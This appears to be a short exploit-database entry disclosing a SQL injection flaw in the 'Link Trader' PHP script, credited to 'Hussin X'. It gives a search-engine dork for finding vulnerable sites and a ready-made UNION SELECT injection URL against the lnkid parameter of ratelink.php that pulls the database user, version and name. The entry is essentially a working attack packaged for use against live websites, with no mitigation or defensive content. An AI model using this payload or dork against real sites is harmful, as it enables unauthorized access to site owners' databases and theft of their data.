id: 10503
date: 12/30/2009
title: Link Trader (lnkid) Remote SQL Injection Vulnerability
author: Hussin X
cves: 

======================================================
Link Trader (lnkid) Remote SQL Injection Vulnerability
======================================================

|___________________________________________________
|                                                   |
|
| script : http://www.ezonescripts.com/scripts/sls/linktrader.php
|
| DorK  : inurl:ratelink.php?lnkid=
|___________________________________________________|
 
Exploit:
 
 
 
www.[target].com/Script/ratelink.php?lnkid=-1+UNION+SELECT+1,2,3,4,concat_ws(0x3a,user(),version(),database()),6,7,8,9,10,11,12+from+o_categories/*



#  0day.today [2023-03-25]  #